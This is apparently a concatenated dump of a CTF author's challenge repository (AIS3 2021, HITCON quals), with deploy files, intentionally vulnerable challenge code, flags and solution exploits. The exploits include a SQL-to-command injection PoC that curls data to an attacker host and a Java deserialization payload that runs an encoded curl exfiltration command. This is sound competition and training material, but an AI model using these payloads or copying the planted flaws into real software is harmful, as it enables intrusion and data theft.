"" 10 | for idx in range(13): 11 | for try_key in range(10): 12 | p.send(str(try_key)) 13 | if p.recvuntil("LOCKED", timeout=2+idx*0.2) == b'': 14 | key += str(try_key) 15 | print("[KEY]", key) 16 | break 17 | else: 18 | p.close() 19 | p = conn() 20 | for k in key: 21 | p.send(k) 22 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN apt-get update 4 | RUN apt-get install xinetd -qy 5 | 6 | RUN useradd --no-create-home --home-dir / --shell /bin/false sandbox 7 | 8 | COPY ./share /game 9 | COPY ./xinetd /etc/xinetd.d/game 10 | COPY ./flag /secr3t_flag_meow_meow 11 | RUN chown -R root:root /game 12 | RUN chmod -R 700 /game 13 | RUN chmod 755 /game 14 | 15 | RUN chown sandbox:sandbox /game/sandbox.py 16 | RUN chmod 4755 /game/sandbox.py 17 | 18 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | cat-slayer-online: 3 | build: ./ 4 | ports: 5 | - "22222:22222" 6 | expose: 7 | - "22222" 8 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/flag: -------------------------------------------------------------------------------- 1 | AIS3{CAO_Cat_Art_Online} -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/share/player.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/share/player.db -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # exec 2>/dev/null 4 | cd /game && ./game.py 5 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/share/sandbox.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import string 4 | if __name__ == '__main__': 5 | # dropping priv. 6 | os.setgroups([]) 7 | os.setgid(1000) 8 | os.setuid(1000) 9 | os.umask(0o077) 10 | 11 | spell = sys.argv[1].strip() 12 | unlocked = sys.argv[2].strip() 13 | unlocked = unlocked.split(",") if len(unlocked) != 0 else [] 14 | max_length = int(sys.argv[3]) 15 | rebirthed = int(sys.argv[4]) 16 | 17 | try: 18 | spell.encode('ascii') 19 | except UnicodeEncodeError: 20 | print("YOU SHALL NOT PASS!") 21 | exit() 22 | 23 | if not rebirthed and len(spell) > max_length: 24 | print("YOU SHALL NOT PASS!") 25 | exit() 26 | 27 | curses = list(string.ascii_lowercase+string.digits+"()'\".") 28 | blacklist = set(curses) 29 | for i in unlocked: 30 | blacklist -= set(curses[int(i)]) 31 | if rebirthed: 32 | blacklist -= set("'\".") 33 | for char in spell: 34 | if char in blacklist: 35 | print("YOU SHALL NOT PASS!") 36 | exit() 37 | 38 | _eval = __builtins__.eval 39 | del __builtins__.exec 40 | del __builtins__.eval 41 | del __builtins__.__import__ 42 | print("[+] Casting Magic... ", _eval(spell, {})) 43 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/xinetd: -------------------------------------------------------------------------------- 1 | service game 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /game/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = root 10 | bind = 0.0.0.0 11 | port = 22222 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | flags = REUSE 16 | } -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Reverse/Peekora/README.md: -------------------------------------------------------------------------------- 1 | # 🐰 Peekora 🥒 / Reverse (168pts) 2 | 3 | 吃太甜要配什麼 4 | 5 | 可樂 6 | 7 | 因為 too 甜配 cola 8 | 9 | Usage: `python3 -m pickle flag_checker.pkl` 10 | 11 | Author: splitline 12 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Reverse/README.md: -------------------------------------------------------------------------------- 1 | # AIS3 2021 Pre-Exam [Reverse] 2 | 3 | ## 🐰 Peekora 🥒 4 | 5 | - Category: Reverse 6 | - Difficulty: Easy 7 | - Solves: 75/327 (Pre-Exam), 0/190 (MyFirstCTF) 8 | - Keywords: Pickle Bytecode 9 | 10 | 其實這題只是讀 bytecode 練習題而已,並告訴大家可以用 pickle 寫程式 —— 然而就算讀不懂(甚至不 disassemble 它),多少也有辦法通靈得出來。但其實除了硬讀以外,還有一些不用花苦力讀的有趣解法,可惜的是好像沒看到什麼人用 XD 11 | 12 | ### Solution 0x01 13 | 14 | ``` 15 | $ python3 -m pickletools -a flag_checker.pkl 16 | ``` 17 | 然後硬讀,讀不懂的就爆破,沒了。 18 | 19 | 99% 的人都是這麼做的。 20 | 21 | ### Solution 0x02 22 | 23 | 簡單看過 bytecode 可以看出它先用 `input` 讀入輸入,再用 `__getitem__` 取出各個字元後用 `__eq__` 之類的東西逐一比對字元。 24 | 25 | 好,夠了,知道這些資訊就可以不用繼續讀了。 26 | 27 | 我們可以把 `__builtins__.input` 改成自己的 function,讓它吐回一個假的 str,其中那個假的 str 自訂了 `__eq__` 等方法的邏輯,讓 pickle 在用 `__eq__` 比對的同時,也順便幫你把正確的 flag 填回去,等 pickle load 完 flag 也出來了。詳情請見 [solve.py](Peekora/solve.py)。 28 | 29 | ### Solution 0x03 30 | 31 | 既然知道只要比對錯一個字元就會觸發 `exit`,那就可以透過這個特性 hook 住 `__builtins__.exit` 藉此爆破出所有字元了。 32 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/README.md: -------------------------------------------------------------------------------- 1 | # 【5/22 重要公告】 / Web (300pts) 2 | 3 | 為了防止系統不穩定的情形頻繁發生,我們(AIS3 MyFirstCTF、Pre-Exam 出題團隊)耗時九年研發了[一套服務](http://quiz.ais3.org:8001)來監控 Web 題目是否正常運作,歡迎參賽者使用,特此公告。 4 | 5 | Author: splitline -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.4-apache 2 | 3 | RUN apt update 4 | RUN apt install netcat-openbsd -qy 5 | RUN mv "$PHP_INI_DIR/php.ini-production" "$PHP_INI_DIR/php.ini" 6 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | web-chals-monitor: 5 | build: ./ 6 | volumes: 7 | - ./src/:/var/www/html/ 8 | - ./flag:/flag_81c015863174cd0c14034cc60767c7f5 9 | ports: 10 | - 8001:80/tcp -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/flag: -------------------------------------------------------------------------------- 1 | AIS3{o1d_skew1_w3b_tr1cks_co11ect10n_:D} 2 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/src/challenges.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/src/challenges.db -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/src/config.php: -------------------------------------------------------------------------------- 1 | querySingle("SELECT name, host, port FROM challenges WHERE id=${_GET['id']}", true); 9 | $host = str_replace(' ', '', $data['host']); 10 | $port = (int) $data['port']; 11 | $data['alive'] = strstr(shell_exec("timeout 1 nc -vz '$host' $port 2>&1"), "succeeded") !== FALSE; 12 | echo json_encode($data); 13 | } else { 14 | $json_resp = []; 15 | $query_res = $db->query("SELECT * FROM challenges"); 16 | while ($row = $query_res->fetchArray(SQLITE3_ASSOC)) $json_resp[] = $row; 17 | echo json_encode($json_resp); 18 | } 19 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/poc.txt: -------------------------------------------------------------------------------- 1 | http://quiz.ais3.org:8001/ 2 | ?module=modules/api 3 | &id=0 union select 1,"';curl%09http://attacker_host/$(cat%09/*);'",3-- -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/README.md: -------------------------------------------------------------------------------- 1 | # Cat Slayer Inverse / Web (487pts) 2 | 3 | > 劇情請參見:**Cat Slayer | Cloud Edition** 及其前情提要 4 | 5 | 一開始也只是普通的和貓咪們玩而已不是嗎?吶,到底為什麼會變成這樣呢?我為什麼會被召喚到這個世界?我為什麼會在這裡?我為什麼會是一隻貓?我在做夢嗎?惡夢?真的好想、好想再和哥哥聊聊天啊⋯⋯從那天起哥哥就在放學時失蹤了,一直都沒能再見到他一面呢,說起來哥哥他啊,他總是—— 6 | 7 | 8 | 等等,哥哥是誰?想不起來啊,好像是很重要的人嗎⋯⋯不,一點都不重要,我現在只需要召喚更多貓貓🐱,不能停下來,還要更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多的⋯⋯[召喚貓貓🐱](http://quiz.ais3.org:8787/maou/) 9 | 10 | Author: splitline feat. Cat Lucifer -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | Maou: 4 | image: tomcat 5 | ports: 6 | - 8787:8080 7 | volumes: 8 | - ./jstl-1.2.jar:/usr/local/tomcat/lib/jstl-1.2.jar 9 | - ./maou.war:/usr/local/tomcat/webapps/maou.war 10 | - ./flag:/____fl4g____ -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/flag: -------------------------------------------------------------------------------- 1 | AIS3{maou_lucifer_meowmeow} 2 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/jstl-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/jstl-1.2.jar -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/maou.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/maou.war -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/exploit/Exploit.java: -------------------------------------------------------------------------------- 1 | import com.cat.Maou; 2 | import java.io.*; 3 | import java.util.Base64; 4 | 5 | public class Exploit { 6 | public static void main(String[] args) throws Exception { 7 | Maou m = new Maou("whatever"); 8 | ByteArrayOutputStream ser = new ByteArrayOutputStream(); 9 | ObjectOutputStream out = new ObjectOutputStream(ser); 10 | out.writeObject(m); 11 | System.out.println(Base64.getEncoder().encodeToString(ser.toByteArray()).replace("+", "%2b")); 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/exploit/com/cat/Cat.java: -------------------------------------------------------------------------------- 1 | package com.cat; 2 | 3 | import java.io.Serializable; 4 | 5 | public abstract class Cat implements Serializable { 6 | public abstract String getName(); 7 | public abstract void setName(String name); 8 | public abstract int getAttack(); 9 | public abstract int getDefense(); 10 | } 11 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/exploit/com/cat/Maou.java: -------------------------------------------------------------------------------- 1 | package com.cat; 2 | 3 | import java.io.IOException; 4 | import java.io.Serializable; 5 | import java.util.ArrayList; 6 | 7 | public class Maou implements Serializable { 8 | private static final long serialVersionUID = 2952304742572984796L; 9 | String[] DEMON_NAMES = { }; 10 | String CAT_NAME_SETTER = "setName"; 11 | String name = "(unnamed)"; 12 | ArrayList cats = new ArrayList<>(); 13 | 14 | public Maou(String name) { 15 | this.name = name; 16 | } 17 | 18 | private void writeObject(java.io.ObjectOutputStream stream) throws IOException { 19 | String[] DEMON_NAMES = { "bash -c {echo,Y3VybCBzcS5wZTo1MDAwLyQoY2F0IC9fX19fZmw0Z19fX18p}|{base64,-d}|{bash,-i} " }; 20 | stream.writeObject(DEMON_NAMES); // DEMON_NAMES 21 | stream.writeObject("exec"); // CAT_NAME_SETTER 22 | stream.writeObject("meowmeow..."); 23 | 24 | // 只需要保留貓咪🐱的種類 25 | ArrayList catsClass = new ArrayList<>(); 26 | catsClass.add("java.lang.Runtime"); 27 | stream.writeObject(catsClass); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/exploit/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | javac Exploit.java && java Exploit -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/README.md: -------------------------------------------------------------------------------- 1 | # XSS Me / Web (452pts) 2 | 3 | I know how to alert(1) I am a hacker now 😎😎😎 4 | 5 | 笑死😂😂😂👍👍這你自己 alert(1) 的嗎😳😳很厲害欸😎😎 哈哈是我啦你是不是很懂駭客啊skrskr🤙🤙🤙😎😎😎👊👊👊🖕🖕🖕🖖🖖🖖 XSS 笑死😂😂😂👍👍這你自己 alert 出來的嗎😳😳很電神欸😎😎 6 | 7 | http://quiz.ais3.org:8003 8 | 9 | > admin 會在登入後訪問你所回報的網址,請試著偷到 admin 在 `http://quiz.ais3.org:8003/getflag` 頁面上的 flag 吧! 10 | > 11 | > 另外,此題有在 html header 中設定簡單的 `Content-Security-Policy`,可以參考:https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP 12 | 13 | Author: splitline -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/deploy/app/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:python3.8 2 | RUN pip3 install redis rq -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/deploy/app/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = main 3 | callable = app 4 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/deploy/bot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN apt update 4 | RUN apt install -f -y --no-install-recommends chromium chromium-driver redis-server 5 | RUN pip3 install selenium redis rq 6 | 7 | COPY xssbot.py /xssbot.py 8 | COPY run.sh /run.sh 9 | RUN chmod +x /run.sh 10 | RUN useradd --no-create-home --home-dir / --shell /bin/false user 11 | 12 | USER user 13 | CMD /run.sh -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/deploy/bot/run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | redis-server --protected-mode no & 3 | for _ in {1..4}; do 4 | rq worker & 5 | done 6 | sleep infinity 7 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/deploy/bot/xssbot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import time 3 | import os 4 | 5 | from selenium.webdriver import Chrome 6 | from selenium.webdriver.chrome.options import Options 7 | from selenium.common.exceptions import TimeoutException, WebDriverException 8 | 9 | TIMEOUT = 3 10 | HOSTNAME = "xss-me" 11 | 12 | def browse(url_path): 13 | options = Options() 14 | options.headless = True 15 | options.add_argument('--no-sandbox') # https://stackoverflow.com/a/45846909 16 | options.add_argument('--disable-dev-shm-usage') # https://stackoverflow.com/a/50642913 17 | chrome = Chrome(options=options) 18 | # https://stackoverflow.com/a/47695227 19 | chrome.set_page_load_timeout(TIMEOUT) 20 | chrome.set_script_timeout(TIMEOUT) 21 | 22 | # login 23 | chrome.get(f"http://{HOSTNAME}/") 24 | chrome.find_element_by_name('username').send_keys('admin') 25 | chrome.find_element_by_name('password').send_keys(os.getenv('PASSWORD')) 26 | chrome.find_element_by_tag_name('button').click() 27 | 28 | # visit 29 | chrome.get(f"http://{HOSTNAME}/{url_path}") 30 | 31 | time.sleep(TIMEOUT) 32 | chrome.quit() -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/deploy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.4" 2 | 3 | x-share-env: &share-env 4 | PASSWORD: 1sBS2dAg7eZUZDp58PGDRrnwYAzQd2HtWgnx9ySfW0M 5 | 6 | services: 7 | xss-me: 8 | depends_on: 9 | - xss-bot 10 | build: ./app 11 | volumes: 12 | - ./app/:/app 13 | ports: 14 | - 8003:80/tcp 15 | environment: 16 | <<: *share-env 17 | 18 | xss-bot: 19 | build: ./bot 20 | image: splitline/xssbot 21 | environment: 22 | <<: *share-env -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/poc.txt: -------------------------------------------------------------------------------- 1 | http://quiz.ais3.org:8003/ 2 | ?message= 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/sdm/app/app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "express": "^4.18.2", 4 | "xfetch-js": "^0.5.0" 5 | }, 6 | "scripts": { 7 | "start": "node app.js" 8 | } 9 | } -------------------------------------------------------------------------------- /hitcon-quals/2022/web/sdm/bot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:17-alpine 2 | 3 | RUN apk update && apk upgrade 4 | RUN apk add chromium 5 | 6 | RUN mkdir /app 7 | WORKDIR /app 8 | COPY package.json yarn.lock /app/ 9 | RUN yarn 10 | 11 | COPY . . 12 | ENTRYPOINT ["yarn", "start"] 13 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/sdm/bot/app.js: -------------------------------------------------------------------------------- 1 | const net = require('net') 2 | const visit = require('./bot') 3 | const dns = require('dns/promises') 4 | 5 | const PORT = process.env.PORT || 7777 6 | const REPORT_HOST = process.env.REPORT_HOST || 'localhost' 7 | 8 | dns.lookup(REPORT_HOST).then(({ address }) => { 9 | const server = net.createServer(async socket => { 10 | if (!socket.remoteAddress.endsWith(address)) { 11 | // remoteAddress may be ipv4 mapped ipv6 address 12 | socket.end('Bad reporting host') 13 | return 14 | } 15 | socket.on('data', async data => { 16 | try { 17 | const url = data.toString().trim() 18 | socket.end('URL received') 19 | socket.destroy() 20 | 21 | if (!url.match(/^https?:\/\//)) { 22 | console.log(`[-] Invalid URL: ${url}`) 23 | return; 24 | } 25 | 26 | console.log(`[+] Received: ${url}`) 27 | await visit(url) 28 | console.log(`[+] Visited: ${url}`) 29 | } catch (e) { 30 | console.log(e) 31 | } 32 | }) 33 | }) 34 | server.listen(PORT, () => { 35 | console.log('Bot socket server listening on port', PORT) 36 | }) 37 | }) 38 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/sdm/bot/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "puppeteer": "^19.3.0" 4 | }, 5 | "scripts": { 6 | "start": "node app.js" 7 | } 8 | } -------------------------------------------------------------------------------- /hitcon-quals/2022/web/sdm/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | services: 3 | bot: 4 | build: 5 | context: ./bot 6 | environment: 7 | - PORT=8080 8 | - SITE=https://sdm.chal.hitconctf.com/ 9 | - REPORT_HOST=chall 10 | - FLAG=hitcon{yeeees all of these r intend3d s0luti0n (should be?)} 11 | chall: 12 | build: 13 | context: ./app 14 | environment: 15 | - HCAPTCHA_SECRET_KEY=0x0000000000000000000000000000000000000000 16 | - BOT_HOST=bot 17 | - BOT_PORT=8080 18 | - HTTPS=1 # unset to use http mode 19 | volumes: 20 | # https credentials (not included) 21 | - ./credentials:/opt/credentials 22 | ports: 23 | - "443:48763" 24 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/sdm/exp/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/web2pdf/exp/genhtml.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | git clone https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT 4 | cd PHP_INCLUDE_TO_SHELL_CHAR_DICT && git apply ../test.py.diff 5 | python test.py 6 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/web2pdf/exp/parse.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | pdfimages -all mpdf.pdf ./ 4 | 5 | python -c 'from PIL import Image 6 | im = Image.open("-000.png") 7 | data=b"".join(map(lambda d: bytes(d)[::-1], im.getdata()))[4:].replace(b"\x00", b"") 8 | open("out.txt","wb").write(data)' 9 | 10 | rm -f -- *.pdf *png 11 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/web2pdf/service/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8-apache 2 | 3 | RUN apt update && apt install -y \ 4 | libfreetype6-dev \ 5 | libjpeg62-turbo-dev \ 6 | libpng-dev \ 7 | git \ 8 | && docker-php-ext-configure gd --with-freetype --with-jpeg \ 9 | && docker-php-ext-install -j$(nproc) gd 10 | 11 | COPY --from=composer/composer /usr/bin/composer /usr/bin/composer 12 | RUN cd /var/www/ && composer require mpdf/mpdf 13 | RUN chmod -R 733 /var/www/vendor/mpdf/mpdf/tmp 14 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/web2pdf/service/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | 3 | services: 4 | web: 5 | build: . 6 | volumes: 7 | - ./src:/var/www/html/ 8 | ports: 9 | - "80:80/tcp" 10 | environment: 11 | - HCAPTCHA_SITE_KEY=10000000-ffff-ffff-ffff-000000000001 12 | - HCAPTCHA_SECRET_KEY=0x0000000000000000000000000000000000000000 13 | 14 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/web2pdf/service/src/hcaptcha.php: -------------------------------------------------------------------------------- 1 | [ 11 | 'method' => 'POST', 12 | 'header' => 'Content-Type: application/x-www-form-urlencoded', 13 | 'content' => http_build_query([ 14 | 'secret' => $_ENV['HCAPTCHA_SECRET_KEY'], 15 | 'response' => $_POST['h-captcha-response'] 16 | ]) 17 | ]])); 18 | $data = json_decode($data); 19 | return $data->success; 20 | } 21 | -------------------------------------------------------------------------------- /hitcon-quals/2023/misc-amf/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM docker:dind 2 | 3 | COPY instancer /www 4 | COPY service /service 5 | WORKDIR /www 6 | 7 | RUN apk add --no-cache --update nodejs npm 8 | RUN npm install 9 | 10 | RUN chmod +x /www/docker-entrypoint.sh 11 | -------------------------------------------------------------------------------- /hitcon-quals/2023/misc-amf/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | instancer: 5 | build: . 6 | entrypoint: /www/docker-entrypoint.sh 7 | ports: 8 | - "80:80" 9 | privileged: true 10 | environment: 11 | - TITLE=AMF::Instancer 12 | - INSTANCER_HOST=sandbox.local 13 | - CHALL_BASE_HOST=.test.splitline.tw 14 | - SCOREBOARD_URL=http://35.201.208.240 15 | - AUTO_DESTROY=15 # minutes 16 | -------------------------------------------------------------------------------- /hitcon-quals/2023/misc-amf/instancer/docker-entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | rm -f /var/run/docker.pid 4 | dockerd & 5 | sleep 3s 6 | 7 | if [ "$(docker images -q service:latest 2> /dev/null)" == "" ]; then 8 | echo "[debug] docker build -t service:latest --build-arg AUTO_DESTROY=$AUTO_DESTROY /service" 9 | docker build -t service:latest --build-arg AUTO_DESTROY=$AUTO_DESTROY /service 10 | fi 11 | 12 | NODE_ENV=production /usr/bin/node app.js 13 | -------------------------------------------------------------------------------- /hitcon-quals/2023/misc-amf/instancer/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "body-parser": "^1.20.1", 4 | "express": "^4.18.2", 5 | "express-session": "^1.17.3", 6 | "http-proxy-middleware": "^2.0.6" 7 | } 8 | } -------------------------------------------------------------------------------- /hitcon-quals/2023/misc-amf/service/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:slim 2 | 3 | RUN pip install Py3AMF 4 | 5 | COPY server.py /app/server.py 6 | 7 | EXPOSE 5000 8 | CMD ["python", "/app/server.py"] 9 | -------------------------------------------------------------------------------- /hitcon-quals/2023/misc-amf/service/server.py: -------------------------------------------------------------------------------- 1 | from pyamf.remoting.gateway.wsgi import WSGIGateway 2 | import secrets 3 | 4 | ADMIN_USER = secrets.token_urlsafe(16) 5 | ADMIN_PASS = secrets.token_urlsafe(16) 6 | 7 | 8 | class FileManagerService: 9 | def read(self, filename): 10 | with open(filename, "rb") as f: 11 | return f.read() 12 | 13 | def list(self, path="/"): 14 | import os 15 | 16 | return os.listdir(path) 17 | 18 | 19 | def auth(username, password): 20 | if username == ADMIN_USER and password == ADMIN_PASS: 21 | return True 22 | 23 | return False 24 | 25 | 26 | gateway = WSGIGateway({"file_manager": FileManagerService}, authenticator=auth) 27 | 28 | 29 | if __name__ == "__main__": 30 | from wsgiref import simple_server 31 | 32 | host = "0.0.0.0" 33 | port = 5000 34 | 35 | httpd = simple_server.WSGIServer((host, port), simple_server.WSGIRequestHandler) 36 | httpd.set_app(gateway) 37 | 38 | print("Running Authentication AMF gateway on http://%s:%d" % (host, port)) 39 | 40 | try: 41 | httpd.serve_forever() 42 | except KeyboardInterrupt: 43 | pass 44 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/app/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20 2 | 3 | WORKDIR /app 4 | 5 | COPY ./ /app 6 | 7 | RUN yarn install 8 | 9 | CMD ["node", "app.js"] 10 | 11 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "body-parser": "^1.20.2", 4 | "mustache-express": "^1.3.2", 5 | "express": "^4.18.2", 6 | "formidable": "^3.5.1", 7 | "uuid": "^9.0.0" 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/app/uploads/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/hitcon-quals/2023/web-sharer/app/uploads/.gitkeep -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/app/views/index.mustache: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Sharer 7 | 8 | 9 | 10 |

Sharer

11 |

Upload your files here

12 | {{#message}} 13 |

{{message}}

14 | {{/message}} 15 |
16 | 17 | 18 |
19 | 20 | 21 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/app/views/preview.mustache: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | {{ name }} - Sharer 9 | 10 | 11 | 12 |
13 |

Preview - {{ name }}

14 |

Download

15 | 16 |
17 | 18 | 19 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/app/views/report.mustache: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Report 9 | 10 | 11 | 12 |
13 |

Report

14 | {{#message}} 15 |

{{message}}

16 | {{/message}} 17 |
18 | 19 | 20 | 21 | 22 | 23 |

24 |
25 |
26 | 27 | 28 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/bot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20 2 | 3 | WORKDIR /app 4 | 5 | RUN apt-get update && apt-get install -y chromium 6 | 7 | ENV PUPPETEER_SKIP_CHROMIUM_DOWNLOAD=true 8 | ENV PUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium 9 | 10 | COPY ./ /app 11 | 12 | RUN yarn add puppeteer express 13 | 14 | CMD ["node", "index.js"] 15 | 16 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | admin-bot.sharer.world: 5 | build: ./bot 6 | restart: always 7 | environment: 8 | - NODE_ENV=production 9 | - PORT=443 10 | - BOT_HOST=admin-bot.sharer.world 11 | - APP_HOST=sharer.world 12 | - SCOREBOARD_URL=http://censored 13 | - FLAG=hitcon{fake} 14 | 15 | volumes: 16 | - /etc/letsencrypt/live/sharer.world/fullchain.pem:/opt/certificates/fullchain.pem 17 | - /etc/letsencrypt/live/sharer.world/privkey.pem:/opt/certificates/privkey.pem # not provided 18 | 19 | sharer.world: 20 | build: ./app 21 | restart: always 22 | ports: 23 | - "443:443" 24 | environment: 25 | - NODE_ENV=production 26 | - PORT=443 27 | - BOT_HOST=admin-bot.sharer.world 28 | 29 | volumes: 30 | - /etc/letsencrypt/live/sharer.world/fullchain.pem:/opt/certificates/fullchain.pem 31 | - /etc/letsencrypt/live/sharer.world/privkey.pem:/opt/certificates/privkey.pem # not provided 32 | 33 | depends_on: 34 | - admin-bot.sharer.world 35 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8-apache 2 | 3 | RUN pecl install redis && docker-php-ext-enable redis 4 | RUN apt update && apt install -y libzip-dev && docker-php-ext-install pdo pdo_mysql zip 5 | 6 | COPY ./src/ /var/www/ 7 | 8 | RUN curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer 9 | RUN cd /var/www/ && composer install 10 | 11 | RUN chmod 1733 /tmp 12 | 13 | COPY ./flag/readflag.c 